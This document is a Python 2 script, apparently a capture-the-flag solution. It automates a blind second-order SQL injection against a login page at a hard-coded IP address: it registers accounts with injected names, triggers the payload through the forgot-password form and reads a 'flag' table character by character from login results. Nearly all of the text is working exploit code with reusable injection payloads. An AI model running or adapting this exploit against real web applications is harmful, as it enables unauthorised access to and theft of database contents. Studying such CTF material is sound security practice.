import random,requests,string#20BILLION_D0LLAR_1D3A <- flag#razor4x - tast

1. import random,requests,string
2.  
3. #20BILLION_D0LLAR_1D3A <- flag
4. #razor4x - tasteless
5.  
6. main="http://54.196.116.77/index.php?page=login"
7. # reg "name=blah&pass=blah&email=blah&register=Register"
8. # forgot name=blah&reset=Forgot+Password&pass=&email=
9. # login name=blah&pass=blah&login=Login&email=
10.  
11. def randomword(length):
12. return ''.join(random.choice(string.lowercase) for i in range(length))
13.  
14. pwd=""
15. for num in xrange(1,22):
16. for c in xrange(32,122):
17. tmp_name=randomword(10)
18. c=chr(c)
19. #print "register the test name"
20. payload = {'name': tmp_name, 'pass': tmp_name, "email":"asd","register":"Register"}
21. r=requests.post(main,data=payload)
22. #print r.text
23. #print "register the exploit name"
24. query=tmp_name+"' and (select if((select substr(flag,"+str(num)+",1) from flag)='"+c+"',1,2*(select 1 union select 2)))#"
25. #query=base+"0"+"'and(select(if((select(1)from(flag)where(flag)like('"+c+"%'))=1,1,2*(select 1 union select 2))))-- -"
26. #query=base+"0"+"'and(select(if((select(1)from(flag)where(flag)like('%'))=1,1,2*(select 1 union select 2))))-- -"
27. payload = {'name': query, 'pass': "asd", "email":"asd","register":"Register"}
28. r=requests.post(main,data=payload)
29. #print r.text
30. #print "forgot request"
31. payload = {'name': query, 'pass': "", "email":"","reset":"Forgot+Password"}
32. r=requests.post(main,data=payload)
33. #print r.text
34. #print "try to login with test name"
35. payload = {'name': tmp_name, 'pass': tmp_name, "email":"","login":"Login"}
36. r=requests.post(main,data=payload)
37. #print r.text
38. if 'Welcome' not in r.text:
39. print "OK: "+c
40. pwd+=c
41. break
42. else:
43. print "Nope..."+c
44.  
45.  
46. #break
47. #break
48. print pwd